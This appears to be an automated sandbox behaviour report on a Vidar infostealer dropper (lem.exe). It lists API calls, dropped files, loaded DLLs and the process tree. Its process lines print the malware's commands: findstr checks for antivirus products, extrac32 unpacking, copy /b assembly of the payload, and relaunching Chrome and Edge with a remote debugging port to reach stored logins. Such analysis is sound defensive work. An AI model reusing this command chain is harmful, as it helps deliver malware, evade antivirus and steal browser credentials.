                Source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2FFE0 CloseHandle,NtProtectVirtualMemory,13_2_00A2FFE0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,13_2_00A84763
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00A71B4D
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00A7F20D
                Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\NortheastPresenceJump to behavior
                Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\FascinatingFeeJump to behavior
                Source: C:\Users\user\Desktop\lem.exeFile created: C:\Windows\FinishedMistressJump to behavior
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A3801713_2_00A38017
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1E1F013_2_00A1E1F0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2E14413_2_00A2E144
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A322A213_2_00A322A2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A122AD13_2_00A122AD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4A26E13_2_00A4A26E
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2C62413_2_00A2C624
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A9C8A413_2_00A9C8A4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4E87F13_2_00A4E87F
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A46ADE13_2_00A46ADE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A82A0513_2_00A82A05
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A78BFF13_2_00A78BFF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2CD7A13_2_00A2CD7A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A3CE1013_2_00A3CE10
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4715913_2_00A47159
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1924013_2_00A19240
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00AA531113_2_00AA5311
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A196E013_2_00A196E0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A3170413_2_00A31704
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A31A7613_2_00A31A76
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A37B8B13_2_00A37B8B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A19B6013_2_00A19B60
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A37DBA13_2_00A37DBA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A31D2013_2_00A31D20
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A31FE713_2_00A31FE7
                Source: C:\Users\user\Desktop\lem.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 00A30DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 00A2FD52 appears 40 times
                Source: lem.exeStatic PE information: invalid certificate
                Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 68QI5X.13.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@97/306@31/16
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A841FA GetLastError,FormatMessageW,13_2_00A841FA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00A72010
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A71A0B AdjustTokenPrivileges,CloseHandle,13_2_00A71A0B
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00A7DD87
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,13_2_00A83A0E
                Source: C:\Users\user\Desktop\lem.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\AuthorizationJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
                Source: C:\Users\user\Desktop\lem.exeFile created: C:\Users\user\AppData\Local\Temp\nst7743.tmpJump to behavior
                Source: lem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\lem.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000011.00000002.2695591525.000051D800798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: AAS00R1VA.13.dr, L68GDJMO8.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: lem.exeVirustotal: Detection: 11%
                Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\user\Desktop\lem.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
                Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AuthorizationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired mJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com mJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\lem.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: appresolver.dllJump to behavior
